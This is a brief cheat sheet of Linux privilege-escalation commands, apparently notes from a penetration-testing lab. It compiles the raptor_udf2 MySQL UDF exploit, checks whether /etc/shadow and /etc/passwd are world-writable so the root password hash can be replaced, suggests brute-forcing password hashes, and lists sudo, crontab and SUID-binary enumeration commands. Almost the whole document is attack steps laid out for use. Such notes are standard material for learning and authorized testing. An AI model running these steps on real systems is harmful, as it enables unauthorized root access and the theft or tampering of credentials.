Linux Privesc Commands

# https://www.exploit-db.com/exploits/1518
cd /home/user/tools/mysql-udf
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

ls -l /etc/shadow
# Bruteforce hashes or if world-writable, generate new password and replace root pw
mkpasswd -m sha-512 pwhere

ls -l /etc/passwd
# If world-writable, generate new password and replace root pw
openssl passwd pwhere

sudo -l
# https://gtfobins.github.io/

cat /etc/crontab
# check file/scripts permissions, path environment variable

find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
find / -type f -perm -4000 2>/dev/null

# https://www.exploit-db.com/